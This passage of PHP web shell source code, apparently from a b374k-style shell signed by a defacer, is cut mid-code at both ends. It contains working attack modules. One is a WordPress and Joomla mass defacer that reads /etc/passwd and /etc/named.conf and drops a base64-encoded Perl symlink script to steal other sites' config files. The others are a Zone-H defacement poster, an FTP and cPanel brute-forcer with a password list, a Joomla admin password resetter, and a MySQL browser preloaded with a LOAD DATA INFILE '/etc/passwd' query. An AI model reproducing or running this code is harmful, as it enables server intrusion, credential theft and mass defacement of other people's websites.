++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target=
"blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORD
PRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['out
put'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEF
ACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2']
= $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAI
LED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defac
ed = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1
'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" t
arget="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSI
ON['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'
&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def
_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zon
e "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);p
rint("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def =
urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;
$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82,
45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>
Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getp
wuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2
Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCi
AgICAkbXNyID0gcXh7cHdkfTs
NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1s
aW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGl
uaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKC
cvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2Nhb
CAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpm
b3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQo
gICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_de
code($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiVie
ws Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-scri
pt .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($
fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].
dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER[
'SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc
');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $m
atch);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',url
decode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01
= file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_ge
t_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"

' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr
'.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td>
<a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td alig
n="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($c
onfig01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {ech
o '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, '
http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class=
"red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i'
,$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="h
ttp://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"
><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02,
$def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="cent
er"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."
<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span
></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($c
ount1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a
href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($coun
t1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&z
h=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_u
rl) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone
"(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);pri
nt("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = ur
lencode($def); $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;
$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82,
45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>
Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getp
wuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2
Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCi
AgICAkbXNyID0gcXh7cHd
kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBz
eW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICA
gc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgIC
BzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpO
w0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0g
QGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICA
gICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/
data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode
($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews I
ndexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .
cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp,
$wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirn
ame($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SER
VER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$
data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match
);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode
($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file
_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_cont
ents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'c
lass="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cl
s.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a h
ref="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="c
enter"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($confi
g01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<
td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http
://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red

">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$co
nfig02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http:
//'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><fo
nt color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def
);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center">
<span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>
");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></t
d>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count
1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a hre
f="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$
count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1"
target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><hea
d><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="styleshe
et" type="text/css"><style type="text/css">.header {position:fixed;width:100%;to
p:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000
;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radi
us: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {backg
round-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); col
or: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weig
ht:bold;}</style><script type="text/javascript">function change() {if(document.g
etElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.
display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\'
;}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}<
/script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;
font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass
Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<
center><div class="mybox" align="center"><form action="" method="post"><table><t
r><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide(
);"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span cla
ss="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr
><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>us
ing /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</sp
an>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="r
adio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of
/etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea
cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input typ
e="hidden" name="form_action" value="1"><table><tr><td><b>index url: </b><input
class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><
input class="inputzbut" type="submit" value="Attack !" name="Submit"></form></di
v></center>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1)
{if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) {
exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_in
dex); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '</body></htm
l>';}
elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){$defacer='ReZK2LL';$displa
y_details=0;$method=14;$reason=5;error_reporting(0);set_time_limit(0);if(!functi
on_exists('curl_init')){echo "CURL ERROR\n";exit;}$cli=(isset($argv[0]))?1:0;if(
$cli==1){$file=$argv[1];$sites=file($file);}if(function_exists(apache_setenv)){@
apache_setenv('no-gzip', 1);}@ini_set('zlib.output_compression', 0);@ini_set('im
plicit_flush', 1);@ob_implicit_flush(true);@ob_end_flush();if(isset($_POST['doma
ins'])){$sites=explode("\n",$_POST['domains']);}if (file_exists($_FILES["file"][
"tmp_name"])){$file=$_FILES["file"]["tmp_name"];$sites=file($file);}
echo <<<EOF
<div align="center"><table width="67%"><tr><td align=center></td></tr></table><b
r><pre>
EOF;
if(!isset($_POST['defacer'])){
echo <<<EOF
<div class="mybox"><h2 class="k2ll33d2">Zone-H Poster</h2><form enctype="multipa
rt/form-data" method="POST"><div align='center'><span lang='en-us'><b>Defacer&nb

sp;:</b></span><input class='inputz' name="defacer" type="text" value="$defacer"
/><br/><table width='55%'><tr><td align='center'><span lang='en-us'><b>Domains:
</b></span><p align='center'> <textarea rows='30' name='domains' placeholde
r=' put domains here' cols='50' class='inputz'></textarea><br/><span lang='en-us
'><b>OR</b></span><br/>Submit form .txt file:<br/><input name="file" type="file"
/><br><br/><br/><input class='inputzbut' type='submit' value='Send' name='submi
t'></p></td></tr></table></form></div>
EOF;
}$defacer=$_POST['defacer'];if(!$sites){echo '</pre>';exit;}$sites=array_unique(
str_replace('http://','',$sites));$total=count($sites);echo "[+] Total unique do
main: $total\n\n";$pause=10;$start=time();$main=curl_multi_init();for($m=0;$m<3;
$m++){$http[] = curl_init();}for($n=0;$n<$total;$n +=30){if($display_details==1)
{for($x=0;$x<30;$x++){echo'[+] Adding '.rtrim($sites[$n+$x]).'';echo "\n";}}$d=$
n+30;if($d>$total){$d=$total;}echo "=====================>[$d/$total]\n";for($w=
0;$w<3;$w++){$p=$w * 10;if(!(isset($sites[$n+$p]))){$pause=$w;break;}$posts[$w]=
"defacer=$defacer&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%
2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&
domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($si
tes[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%
2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&
domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($s
ites[$n+$p+9])."&hackmode=".$method."&reason=".$reason."&submit=Send";$curlopt=a
rray(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/535.16
(KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER =>
true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING => true,CURLOPT_HEADER => f
alse,CURLOPT_HTTPHEADER => array("Keep-Alive: 7"),CURLOPT_CONNECTTIMEOUT => 3,CU
RLOPT_URL => 'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS => $posts[$w
]);curl_setopt_array($http[$w],$curlopt);curl_multi_add_handle($main,$http[$w]);
}$running = null;do{curl_multi_exec($main,$running);}while($running > 0);for($m=
0;$m<3;$m++){if($pause==$m){break;}curl_multi_remove_handle($main, $http[$m]);$c
ode = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if ($code != 200) {while(true)
{echo' [-]Error!....Retrying';echo "\n";sleep(5);curl_exec($http[$m]);$code = cu
rl_getinfo($http[$m], CURLINFO_HTTP_CODE);if( $code== 200){break 1;}}}}}$end= ti
me() - $start;echo 'Done';echo "\n\n[*]Time: $end seconds\n";curl_multi_close($m
ain);if($cli==0){echo '</pre></body></html>';}exit;}
elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')){$connect_timeout=5;
set_time_limit(0);$submit=$_REQUEST['submit'];$users=$_REQUEST['users'];$pass=$_
REQUEST['passwords'];$target=$_REQUEST['target'];$cracktype=$_REQUEST['cracktype
'];if($target == ""){$target = "localhost";}?><div align="center"><form method="
POST" style="border: 1px solid #000000"><br><?php function ftp_check($host,$user
,$pass,$timeout){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HTTPAUTH, C
URLAUTH_BASIC);curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);curl_setopt($ch, CURLOPT
_USERPWD, "$user:$pass");curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);cur
l_setopt($ch, CURLOPT_FAILONERROR, 1);$data = curl_exec($ch);if ( curl_errno($ch
) == 28 ) {print "<b>Connection Timed out</b>";exit;}elseif ( curl_errno($ch) ==
0 ){print "<table width='67%'><tr><td align=center><b>Username ($user) | Passwo
rd ($pass)</b></td></tr></table>";}curl_close($ch);}function cpanel_check($host,
$user,$pass,$timeout){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://$h
ost:2082");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_
HTTPAUTH, CURLAUTH_BASIC);curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");curl_
setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);curl_setopt($ch, CURLOPT_FAILONER
ROR, 1);$data = curl_exec($ch);if ( curl_errno($ch) == 28 ) {print "<b>Connectio
n Timed out</b>";exit;}elseif ( curl_errno($ch) == 0 ){print "<table width='67%'
><tr><td align=center><b>[+]Username ($user) | Password ($pass)</b></td></tr></t
able>";}curl_close($ch);}if(isset($submit) && !empty($submit)){if(empty($users)
&& empty($pass)){print "<p><b>Error : Check The Users and Password List</b></p>"
;exit;}if(empty($users)){print "<p><b>Error :Check The Users List</b></p>";exit;
}if(empty($pass) ){print "<p><b>Error :Check The Password List</b></p>";exit;};$
userlist=explode("\n",$users);$passlist=explode("\n",$pass);print "<b>[~] Wait .

..</b><br><br>";foreach ($userlist as $user) {$pureuser = trim($user);foreach ($
passlist as $password ) {$purepass = trim($password);if($cracktype == "ftp"){ftp
_check($target,$pureuser,$purepass,$connect_timeout);}if ($cracktype == "cpanel"
){cpanel_check($target,$pureuser,$purepass,$connect_timeout);}}}}
echo "<cecnter><div class='mybox'><h2 class='k2ll33d2'>The Cracker</h2><form met
hod=POST action=''><table width='67%'><tr><td><br><p align='center'><b><span lan
g='en-us'>IP</span> :<input class='inputz' type='text' name='target' size='16' v
alue=$target></b></p><div align='center'><p align='center'>users<textarea class=
'inputz' cols=20 rows=20 name='users'>";
system('ls /var/mail');
echo "</textarea>passwords<textarea class='inputz' cols=20 rows=20 name='passwor
ds'>123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\nadmin\n332211\
n14789632\npasswd\n159357\n357951\n114477\npass\nPassword</textarea><br><br><inp
ut name='cracktype' value='cpanel' checked type='radio'></span><b>Cpanel(2082)</
b><input name='cracktype' value='ftp' style='font-weight: 700;' type='radio'></f
ont></font><font style='font-weight: 700;' size='2' face='Tahoma'><span style='f
ont-weight: 700;'>Ftp (21)</span></p><br><center><input class='inputzbut' type='
submit' value='Start Cracking' name='submit'></center></td></tr></table></td></t
r></form></div></center>";die();}
elseif(isset($_GET['x']) && ($_GET['x'] == 'joomla')){if(empty($_POST['pwd'])){e
cho "<br><br><br><center><div class='mybox'><h2 class='k2ll33d2'>Joomla login ch
anger</h2><FORM method='POST'><br><br><br>DB_Prefix :  <INPUT class ='
inputz' size='8' value='jos_' name='prefix' type='text'> host :
<INPUT class ='inputz' size='10' value='localhost' name='localhost' type='text'>
database :  <INPUT class ='inputz' size='10' value='database' na
me='database' type='text'> username :  <INPUT class ='inputz' siz
e='10' value='db_user' name='username' type='text'> password :  <
INPUT class ='inputz' size='10' value='db_pass' name='password' type='text'><br>
  <br>New Username:  <INPUT class ='inputz' name='admin' siz
e='15' value='k2'><br><br>New Password:  <INPUT class ='inputz' name='
pwd' size='15' value='123123'><br><br>  <INPUT value='change' class='i
nputzbut' name='send' type='submit'></FORM></div></center>";}else {$prefix = $_P
OST['prefix'];$localhost = $_POST['localhost'];$database = $_POST['database'];$
username = $_POST['username'];$password = $_POST['password'];$admin = $_POST['
admin'];$pd = ($_POST["pwd"]);$pwd = md5($pd);@mysql_connect($localhost,$usernam
e,$password) or die (mysql_error());@mysql_select_db($database) or die (mysql_er
ror());$SQL=@mysql_query("UPDATE ".$prefix."users SET username ='".$admin."' WHE
RE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_
error());$SQL=@mysql_query("UPDATE ".$prefix."users SET password ='".$pwd."' WHE
RE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_
error());if($SQL) echo "<br><br><center><h1>Done... go and login</h1></center>";
}}
elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){if(isset($_GET['sqlhost'])
&& isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])
){$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlp
ass'];$sqlport = $_GET['sqlport'];if($con = @mysql_connect($sqlhost.":".$sqlport
,$sqluser,$sqlpass)){$msg .= "<div style='width:99%;padding:4px 10px 0 10px;'>";
$msg .= "<p>Connected to ".$sqluser."<span class='gaya'>@</span>".$sqlhost.":".$
sqlport;$msg .= "  <span class='gaya'>-></span>  <a href=
'?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&s
qlpass=".$sqlpass."&sqlport=".$sqlport."&'>[ databases ]</a>";if(isset($
_GET['db'])) $msg .= "  <span class='gaya'>-></span>  <a
href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&
amp;sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."'>".html
specialchars($_GET['db'])."</a>";if(isset($_GET['table'])) $msg .= "
<span class='gaya'>-></span>  <a href='?y=".$pwd."&x=mysql&
sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlpo
rt=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."'>".htmlspeci
alchars($_GET['table'])."</a>";$msg .= "</p><p>version : ".mysql_get_server_info
($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if

(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b37
4k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TA
BLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";$
msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'><inp
ut type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' valu
e='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input
type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='
sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$s
qlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name
='sqlquery' class='output' style='width:98%;height:80px;'>$query</textarea></p>
<p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit'
value='Go !' /></p> </form></div> ";$tables = array();$msg .= "<table class='ex
plore' style='width:99%;'><tr><th>available tables on ".$db."</th></tr>";$hasil
= @mysql_list_tables($db,$con);
while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @so
rt($tables);
foreach($tables as $table){$msg .= "<tr><td><a href='?y=".$pwd."&x=mysql&amp
;sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlp
ort=".$sqlport."&db=".$db."&table=".$table."'>$table</a></td></tr>";} $m
sg .= "</table>";}
elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
$db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$tab
le." LIMIT 0,100;";$msgq = "<div style='width:99%;padding:0 10px;'><form action=
'?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type=
'hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".
$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <inpu
t type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name
='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."
' /> <input type='hidden' name='table' value='".$table."' /> <p><textarea name='
sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p
> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submi
t' value='Go !' /></p> </form></div> ";$columns = array();$msg = "<table class='
explore' style='width:99%;'>";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".
$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "<th>$column</th
>";$kolum = $column;}$msg .= "</tr>";$hasil = @mysql_query("SELECT count(*) FROM
".$db.".".$table);
list($total) = mysql_fetch_row($hasil);
if(isset($_GET['z'])) $page = (int) $_GET['z'];
else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($pag
e - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT
".$start.",".$pagenum);
while($datas = @mysql_fetch_assoc($hasil)){$msg .= "<tr>";foreach($datas as $dat
a){if(trim($data) == "")
$data = " ";$msg .= "<td>$data</td>";}$msg .= "</tr>";} $msg .= "</table>";
$head = "<div style='padding:10px 0 0 6px;'> <form action='?' method='get'> <inp
ut type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' valu
e='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input
type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='
sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$s
qlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidd
en' name='table' value='".$table."' /> Page <select class='inputz' name='z' onch
ange='this.form.submit();'>";
for($i = 1;$i <= $totpage;$i++){$head .= "<option value='".$i."'>".$i."</option>
";
if($i == $_GET['z']) $head .= "<option value='".$i."' selected='selected'>".$i."
</option>";} $head .= "</select><noscript><input class='inputzbut' type='submit'
value='Go !' /></noscript></form></div>";$msg = $msgq.$head.$msg;}
elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db
'];$query = magicboom($_GET['sqlquery']);
$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <i
nput type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' va
lue='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <inpu
t type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name
='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".
$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea na
me='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea
></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='s
ubmit' value='Go !' /></p> </form></div> ";@mysql_select_db($db);$querys = explo
de(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_
query($query);
if($hasil){$msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query.";&nbsp
;  <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";$ms
g .= "<table class='explore' style='width:99%;'><tr>";
for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mys
ql_field_name($hasil,$i))."</th>";$msg .= "</tr>";for($i=0;$i<@mysql_num_rows($h
asil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "<tr>";for($j=0;$j<@mysql_
num_fields($hasil);$j++) {
if($rows[$j] == "") $dataz = " ";
else $dataz = $rows[$j];$msg .= "<td>".$dataz."</td>";} $msg .= "</tr>";} $msg .
= "</table>";}
else $msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; &nbsp
; <span class='gaya'>[</span> error <span class='gaya'>]</span></p>";} } }
else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "<div s
tyle='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hid
den' name='y' value='".$pwd."' /><input type='hidden' name='x' value='mysql' /><
input type='hidden' name='sqlhost' value='".$sqlhost."' /><input type='hidden' n
ame='sqluser' value='".$sqluser."' /><input type='hidden' name='sqlport' value='
